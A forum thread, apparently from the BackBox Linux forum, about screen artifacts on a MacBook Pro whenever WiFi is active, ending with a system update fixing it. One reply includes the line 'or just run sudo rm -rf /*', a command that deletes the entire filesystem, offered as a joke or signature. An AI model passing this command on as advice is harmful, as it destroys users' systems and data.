Hello everyone,

I recently installed BackBox as dualboot on my macbookPro 10,1 (the retina one). I started having problems with my WiFi card, but I managed to fix that with a manual install of the drivers. Now I'm having a strange problem: everytime the WiFi connection is active, my screen makes strange artifacts, making it impossible to read or do anything (I must shutdown the system using the power button).
If I deactivate WiFi, however, it runs just fine.

I hope someone is able to help me, as I already tried to look for a solution, without much luck :/

Hi, that is strange and only what i have in mind is that you need other drivers. Also when that problem comes, check after /var/log/syslog and see for errors, they are not hidden.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

I tried 2 different drivers. I just installed the ubuntu ones but I still have the same problem sadly :/

Just an update:

The problem persists but what is even more stranger is that if I move my monitor (usually opening it more) the artifacts stop appearing (even tho my monitor is perfectly fine and not damaged).

EDIT 2: I finally managed to run a system update and the problem seems fixed :P

Ok, that is good news, pls set topic as SOLVED.
